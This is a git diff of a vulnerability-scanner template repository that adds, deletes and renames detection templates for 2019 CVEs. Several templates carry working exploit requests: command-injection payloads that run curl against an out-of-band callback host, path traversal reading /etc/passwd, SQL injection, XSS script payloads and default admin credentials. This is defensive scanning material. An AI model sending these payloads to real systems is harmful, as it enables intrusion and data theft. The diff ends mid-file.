b/nuclei-templates/CVE-2019/CVE-2019-20224.yaml deleted file mode 100644 index e6ded4687b..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-20224.yaml +++ /dev/null @@ -1,61 +0,0 @@ -id: CVE-2019-20224 - -info: - name: Pandora FMS 7.0NG - Remote Command Injection - author: ritikchaddha - severity: high - description: | - Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system. - remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. - reference: - - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ - - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9 - - https://nvd.nist.gov/vuln/detail/CVE-2019-20224 - - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view - - https://pandorafms.com/downloads/solved-pandorafms-742.mp4 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2019-20224 - cwe-id: CWE-78 - epss-score: 0.18764 - epss-percentile: 0.95774 - cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: artica - product: pandora_fms - tags: cve,cve2019,pandorafms,rce,authenticated,oast,artica - -http: - - raw: - - | - POST /pandora_console/index.php?login=1 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - nick=admin&pass=admin&login_button=Login - - | - POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - name: "http" - part: interactsh_protocol - words: - - "http" - - - type: status - status: - - 200 -# digest: 490a00463044022046ac7207d2f9331283e0b83f2ec5f492144749de02ae7a6eb328fc4c5c3d40270220014b1f4e41a4c8e7fb88abf43f8baf6f2673f8fd542c36dcc365a951f84516a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-20360.yaml b/nuclei-templates/CVE-2019/CVE-2019-20360.yaml deleted file mode 100644 index 3b2a3591f0..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-20360.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2019-20360 - -info: - name: > - GiveWP <= 2.5.4 - Authorization Bypass - author: topscoder - severity: high - description: > - A flaw in Give before 2.5.5, a WordPress plugin, allowed unauthenticated users to bypass API authentication methods and access personally identifiable user information (PII) including names, addresses, IP addresses, and email addresses. Once an API key has been set to any meta key value from the wp_usermeta table, and the token is set to the corresponding MD5 hash of the meta key selected, one can make a request to the restricted endpoints, and thus access sensitive donor data. - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/4794858f-ebaf-4adf-ab08-309964c18c00?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-20360 - metadata: - fofa-query: "wp-content/plugins/give/" - google-query: inurl:"/wp-content/plugins/give/" - shodan-query: 'vuln:CVE-2019-20360' - tags: cve,wordpress,wp-plugin,give,high - -http: - - method: GET - redirects: true - max-redirects: 3 - path: - - "{{BaseURL}}/wp-content/plugins/give/readme.txt" - - extractors: - - type: regex - name: version - part: body - group: 1 - internal: true - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - - type: regex - name: version - part: body - group: 1 - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "give" - part: body - - - type: dsl - dsl: - - compare_versions(version, '<= 2.5.4') \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-25141.yaml b/nuclei-templates/CVE-2019/CVE-2019-25141.yaml new file mode 100644 index 0000000000..0d8a8c8a0d --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-25141.yaml @@ -0,0 +1,58 @@ +id: CVE-2019-25141 + +info: + name: > + Easy WP SMTP <= 1.3.9 - Missing Authorization to Arbitrary Options Update + author: topscoder + severity: critical + description: > + The Easy WP SMTP plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.3.9. This is due to missing capability checks on the admin_init() function, in addition to insufficient input validation. This makes it possible for unauthenticated attackers to modify the plugins settings and arbitrary options on the site that can be used to inject new administrative user accounts. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/84b75f7d-7258-46f6-aee6-b96d70bee264?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-25141 + metadata: + fofa-query: "wp-content/plugins/easy-wp-smtp/" + google-query: inurl:"/wp-content/plugins/easy-wp-smtp/" + shodan-query: 'vuln:CVE-2019-25141' + tags: cve,wordpress,wp-plugin,easy-wp-smtp,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-wp-smtp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.9.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-2725.yaml b/nuclei-templates/CVE-2019/CVE-2019-2725.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-2725.yaml rename to nuclei-templates/CVE-2019/CVE-2019-2725.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-2767.yaml b/nuclei-templates/CVE-2019/CVE-2019-2767.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-2767.yaml rename to nuclei-templates/CVE-2019/CVE-2019-2767.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-3401.yaml b/nuclei-templates/CVE-2019/CVE-2019-3401.yaml new file mode 100644 index 0000000000..a3d0348acc --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-3401.yaml @@ -0,0 +1,33 @@ +id: CVE-2019-3401 + +info: + name: Atlassian JIRA Information Exposure (CVE-2019-3401) + author: TechbrunchFR,milo2012 + description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. + severity: medium + tags: cve,cve2019,jira,atlassian,exposure + reference: https://jira.atlassian.com/browse/JRASERVER-69244 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-3401 + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular" + matchers: + - type: word + words: + - '' + - 'Manage Filters - Jira' + condition: and + +# Remediation: +# Ensure that this permission is restricted to specific groups that require it. +# You can restrict it in Administration > System > Global Permissions. +# Turning the feature off will not affect existing filters and dashboards. +# If you change this setting, you will still need to update the existing filters and dashboards if they have already been +# shared publicly. +# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. diff --git a/nuclei-templates/CVE-2019/cve-2019-3911.yaml b/nuclei-templates/CVE-2019/CVE-2019-3911.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-3911.yaml rename to nuclei-templates/CVE-2019/CVE-2019-3911.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-3912.yaml b/nuclei-templates/CVE-2019/CVE-2019-3912.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-3912.yaml rename to nuclei-templates/CVE-2019/CVE-2019-3912.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-3929.yaml b/nuclei-templates/CVE-2019/CVE-2019-3929.yaml new file mode 100644 index 0000000000..4dd148b3e1 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-3929.yaml @@ -0,0 +1,33 @@ +id: CVE-2019-3929 + +info: + name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929) + author: _0xf4n9x_ + severity: critical + description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root. + reference: + - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html + - https://www.exploit-db.com/exploits/46786/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-3929 + tags: rce,cve,cve2019,oast,injection + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-3929 + cwe-id: CWE-78 + +requests: + - method: POST + path: + - "{{BaseURL}}/cgi-bin/file_transfer.cgi" + + body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2019/CVE-2019-6112.yaml b/nuclei-templates/CVE-2019/CVE-2019-6112.yaml deleted file mode 100644 index c0122af84f..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-6112.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: cve-2019-6112 -info: - name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting - author: dwisiswant0 - severity: medium - description: A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field). - references: https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b - tags: cve,cve2019,wordpress,wp-plugin,xss -requests: - - method: GET - path: - - "{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - 'id="sell-media-search-text" class="sell-media-search-text"' - - "alert(1337)" - condition: and - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/wordpress/CVE-2019-6715-4187.yaml b/nuclei-templates/CVE-2019/CVE-2019-6715.yaml similarity index 100% rename from nuclei-templates/wordpress/CVE-2019-6715-4187.yaml rename to nuclei-templates/CVE-2019/CVE-2019-6715.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-7192.yaml b/nuclei-templates/CVE-2019/CVE-2019-7192.yaml new file mode 100644 index 0000000000..54e5da5d21 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-7192.yaml @@ -0,0 +1,87 @@ +id: CVE-2019-7192 + +info: + name: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution + author: DhiyaneshDK + severity: critical + description: | + This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of QNAP QTS and Photo Station. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-7192 + - https://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html + - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2022-2546 + - https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-7192 + cwe-id: CWE-863 + epss-score: 0.96341 + epss-percentile: 0.99518 + cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: qnap + product: photo_station + shodan-query: 'Content-Length: 580 "http server 1.0"' + tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss + +http: + - raw: + - | + POST /photo/p/api/album.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + a=setSlideshow&f=qsamplealbum + - | + GET /photo/slideshow.php?album={{album_id}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + - | + POST /photo/p/api/video.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd + + matchers-condition: and + matchers: + - type: regex + part: body_3 + regex: + - "admin:.*:0:0:" + + - type: word + part: header_3 + words: + - video/subtitle + + - type: status + part: header_3 + status: + - 200 + + extractors: + - type: regex + name: album_id + part: body_1 + group: 1 + regex: + - '([a-zA-Z]+)<\/output>' + internal: true + + - type: regex + name: access_code + part: body_2 + group: 1 + regex: + - encodeURIComponent\('([A-Za-z0-9]+)'\) + internal: true +# digest: 490a00463044022038d4a2748704935b1e8bc5116823f31085bcbf7ea7e50794a573a764ae591c9302205bad9bbdd999c6e5f0f33dd0b4fe2e294705d0497bec580f6ecbad2993041d87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-7238.yaml b/nuclei-templates/CVE-2019/CVE-2019-7238.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-7238.yaml rename to nuclei-templates/CVE-2019/CVE-2019-7238.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-7609.yaml b/nuclei-templates/CVE-2019/CVE-2019-7609.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-7609.yaml rename to nuclei-templates/CVE-2019/CVE-2019-7609.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-8449.yaml b/nuclei-templates/CVE-2019/CVE-2019-8449.yaml new file mode 100644 index 0000000000..5ae0e70a6c --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-8449.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-8449 + +info: + name: JIRA Unauthenticated Sensitive Information Disclosure + author: harshbothra_ + severity: medium + description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. + reference: + - https://www.doyler.net/security-not-included/more-jira-enumeration + - https://jira.atlassian.com/browse/JRASERVER-69796 + tags: cve,cve2019,atlassian,jira,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-8449 + cwe-id: CWE-306 + +requests: + - method: GET + path: + - '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '{"users":{"users":' + part: body diff --git a/nuclei-templates/CVE-2019/cve-2019-8903.yaml b/nuclei-templates/CVE-2019/CVE-2019-8903.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-8903.yaml rename to nuclei-templates/CVE-2019/CVE-2019-8903.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-9082.yaml b/nuclei-templates/CVE-2019/CVE-2019-9082.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-9082.yaml rename to nuclei-templates/CVE-2019/CVE-2019-9082.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-9567.yaml b/nuclei-templates/CVE-2019/CVE-2019-9567.yaml new file mode 100644 index 0000000000..e1920a4831 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-9567.yaml @@ -0,0 +1,58 @@ +id: CVE-2019-9567 + +info: + name: > + Forminator Plugin <= 1.5.4 - Cross-Site Scripting + author: topscoder + severity: medium + description: > + The "Forminator Contact Form, Poll & Quiz Builder" plugin before 1.6 for WordPress has XSS via a custom input field of a poll. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/efe6c4aa-5e5d-4e3b-8a38-f85e163a9e00?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-9567 + metadata: + fofa-query: "wp-content/plugins/forminator/" + google-query: inurl:"/wp-content/plugins/forminator/" + shodan-query: 'vuln:CVE-2019-9567' + tags: cve,wordpress,wp-plugin,forminator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "forminator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6') \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-9618.yaml b/nuclei-templates/CVE-2019/CVE-2019-9618.yaml deleted file mode 100644 index 7dd95d8c85..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-9618.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2019-9618 -info: - name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI) - author: daffainfo - severity: critical - description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter. - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 - - https://seclists.org/fulldisclosure/2019/Mar/26 - - https://www.exploit-db.com/exploits/46537 - - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 - tags: cve,cve2019,wordpress,wp-plugin,lfi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-9618 - cwe-id: CWE-22 -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - type: status - status: - - 200 - - 500 diff --git a/nuclei-templates/CVE-2019/CVE-2019-9912.yaml b/nuclei-templates/CVE-2019/CVE-2019-9912.yaml new file mode 100644 index 0000000000..fc848dd72f --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-9912.yaml @@ -0,0 +1,58 @@ +id: CVE-2019-9912 + +info: + name: > + WP Google Maps < 7.10.43 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The wp-google-maps plugin before 7.10.43 for WordPress has XSS via the wp-admin/admin.php PATH_INFO. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b23d4868-068a-4ee9-8253-8f7063cdb03e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-9912 + metadata: + fofa-query: "wp-content/plugins/wp-google-maps/" + google-query: inurl:"/wp-content/plugins/wp-google-maps/" + shodan-query: 'vuln:CVE-2019-9912' + tags: cve,wordpress,wp-plugin,wp-google-maps,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-google-maps/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-google-maps" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.10.41') \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-9922.yaml b/nuclei-templates/CVE-2019/CVE-2019-9922.yaml new file mode 100644 index 0000000000..caff895c05 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-9922.yaml @@ -0,0 +1,45 @@ +id: CVE-2019-9922 + +info: + name: Joomla! Harmis Messenger 1.2.2 - Local File Inclusion + author: 0x_Akoko + severity: high + description: Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! application. + remediation: | + Update to the latest version of Harmis Messenger (1.2.3) or apply the patch provided by the vendor to fix the LFI vulnerability. + reference: + - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md + - https://extensions.joomla.org/extension/je-messenger/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-9922 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-9922 + cwe-id: CWE-22 + epss-score: 0.01171 + epss-percentile: 0.83428 + cpe: cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:* + metadata: + max-request: 1 + vendor: harmistechnology + product: je_messenger + framework: joomla\! + tags: cve2019,cve,joomla,messenger,lfi,harmistechnology,joomla\! + +http: + - method: GET + path: + - "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 +# digest: 4a0a00473045022025eb2b749f69315baa135f24019ef15db3c396a62f1595cbb6af53dc14d7aae8022100cde31cfbe066dad7ce440cdc4f4ee06dc3da7c57a7185cf726aaf72c7d6149a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-0230.yaml b/nuclei-templates/CVE-2019/cve-2019-0230.yaml new file mode 100644 index 0000000000..afe490d14c --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-0230.yaml @@ -0,0 +1,26 @@ +id: CVE-2019-0230 + +info: + name: Apache Struts RCE + author: geeknik + description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. + reference: + - https://cwiki.apache.org/confluence/display/WW/S2-059 + - https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability + severity: critical + tags: struts,rce,cve,cve2019 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-0230 + cwe-id: CWE-915 + +requests: + - method: GET + path: + - "{{BaseURL}}/?id=nuclei%25{128*128}" + + matchers: + - type: word + words: + - "nuclei16384" diff --git a/nuclei-templates/CVE-2019/CVE-2019-10068.yaml b/nuclei-templates/CVE-2019/cve-2019-10068.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-10068.yaml rename to nuclei-templates/CVE-2019/cve-2019-10068.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-10232.yaml b/nuclei-templates/CVE-2019/cve-2019-10232.yaml deleted file mode 100644 index 85d3c410c0..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-10232.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2019-10232 - -info: - name: Teclib GLPI <= 9.3.3 Unauthenticated SQL Injection - author: RedTeamBrasil - severity: critical - description: "Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records." - reference: - - https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf - - https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c - - https://nvd.nist.gov/vuln/detail/CVE-2019-10232 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-10232 - cwe-id: CWE-89 - tags: cve,cve2019,glpi,sqli,injection - -requests: - - method: GET - path: - - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - "-MariaDB-" - - "Start unlock script" - condition: and - - extractors: - - type: regex - part: body - regex: - - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" - -# Enhanced by mp on 2022/03/29 diff --git a/nuclei-templates/CVE-2019/cve-2019-10717.yaml b/nuclei-templates/CVE-2019/cve-2019-10717.yaml deleted file mode 100644 index b8437cc1af..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-10717.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2019-10717 -info: - name: BlogEngine.NET 3.3.7.0 - Local File Inclusion - author: arafatansari - severity: high - description: | - BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter - reference: - - https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect - - https://github.com/rxtur/BlogEngine.NET/commits/master - - https://nvd.nist.gov/vuln/detail/CVE-2019-10717 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N - cvss-score: 7.1 - cve-id: CVE-2019-10717 - cwe-id: CWE-22 - metadata: - shodan-query: http.html:"Blogengine.net" - verified: "true" - tags: cve,cve2019,blogengine,lfi,traversal -requests: - - method: GET - path: - - "{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent" - matchers-condition: and - matchers: - - type: regex - regex: - - '~/App_Data/files/../../([a-zA-Z0-9\.\-]+)/([a-z0-9]+)' - - type: word - part: header - words: - - "application/json" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/03 diff --git a/nuclei-templates/CVE-2019/CVE-2019-10758.yaml b/nuclei-templates/CVE-2019/cve-2019-10758.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-10758.yaml rename to nuclei-templates/CVE-2019/cve-2019-10758.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-11043.yaml b/nuclei-templates/CVE-2019/cve-2019-11043.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-11043.yaml rename to nuclei-templates/CVE-2019/cve-2019-11043.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-11370.yaml b/nuclei-templates/CVE-2019/cve-2019-11370.yaml new file mode 100644 index 0000000000..58ffa77862 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-11370.yaml @@ -0,0 +1,39 @@ +id: CVE-2019-11370 +info: + name: Carel pCOWeb < B1.2.4 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field. + reference: + - https://www.exploit-db.com/exploits/46897 + - https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370 + - https://nvd.nist.gov/vuln/detail/CVE-2019-11370 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2019-11370 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"pCOWeb" + verified: "true" + tags: cve,cve2019,pcoweb,xss,carel +requests: + - raw: + - | + POST /config/pw_snmp_done.html HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + %3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E + - | + GET /config/pw_snmp.html HTTP/1.1 + Host: {{Hostname}} + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "text/html")' + - status_code_2 == 200 + - contains(body_2, 'value=\"\">\">') + condition: and diff --git a/nuclei-templates/CVE-2019/cve-2019-12581.yaml b/nuclei-templates/CVE-2019/cve-2019-12581.yaml new file mode 100644 index 0000000000..5358af45d6 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-12581.yaml 